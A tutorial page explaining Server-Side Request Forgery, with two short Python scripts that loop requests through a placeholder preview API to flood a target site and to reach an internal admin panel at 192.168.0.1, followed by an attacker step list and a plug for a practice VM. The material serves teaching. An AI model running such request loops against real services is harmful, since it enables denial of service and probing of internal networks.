Server-Side Request Forgery (SSRF) is a security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. This can result in unauthorized actions or access to data within the organization or internal network, depending on the nature of the application and its access rights. SSRF is particularly dangerous because it allows attackers to bypass firewalls, access internal services, and perform actions as if they were a legitimate part of the server's operational protocols.
Understanding SSRF
SSRF vulnerabilities occur when a web application fetches a remote resource without validating the user-supplied URL. An attacker can exploit this by crafting a URL or request that causes the server to perform an unintended action. For example, an application might allow users to download or fetch content from a URL, but if the application does not properly validate that URL, attackers can use it to probe internal networks or access services available only from the server's local network.
Example 1
Imagine you having a website, where people can submit their favourite links to other people. After an URL is submitted, you generate a preview of that website. A hacker could exploit that feature by spamming requests to fetch website previews while using your server as a proxy (launch a DoS attack)
import requests
import time
import sys
def make_api_request():
url = "https://api.favouritelinks.pwn/gen_preview?site=www.websiteyouwannaattack.pwn"
try:
response = requests.get(url)
if response.status_code == 403:
print("Received 403 Forbidden response. Exiting...")
sys.exit(1)
else:
print("API Request Successful:", response.text)
except requests.RequestException as e:
print("Error making API request:", e)
if __name__ == "__main__":
while True:
make_api_request()
time.sleep(1) # Sleep for 1 second before making the next requestThe code above tries to submit a request to preview a website every second, if it receives the 403 code (forbidden), then it exits the code.
Example 2
Another example is the using the SSRF vulnerability to access local, private IP addresses, which aren't supposed to be accessed. Let's say that you run a website, that saves a webpage into a text file. A hacker could exploit that to access your local admin panel or other computers on the local network. Here's another example:
import requests
import time
import sys
def make_api_request():
url = "https://api.webtotext.pwn/generatepagesource?site=192.168.0.1/admin"
try:
response = requests.get(url)
if response.status_code == 403:
print("Received 403 Forbidden response. Exiting...")
sys.exit(1)
else:
print("API Request Successful:", response.text)
except requests.RequestException as e:
print("Error making API request:", e)
if __name__ == "__main__":
while True:
make_api_request()
time.sleep(1) # Sleep for 1 second before making the next requestExploiting SSRF
To exploit an SSRF vulnerability, an attacker might:
- Launch a DoS attack by using you as a proxy
- Identify a point in the application where external resources are fetched based on user input.
- Craft a malicious URL or input that causes the server to initiate a request to an unintended destination.
- Use this capability to explore the internal network, access sensitive endpoints, or exfiltrate data.
Try it in pwn.VM!
Try the tutorial in our new online Linux VM provider with a free 1 hour session limit for non subscribers!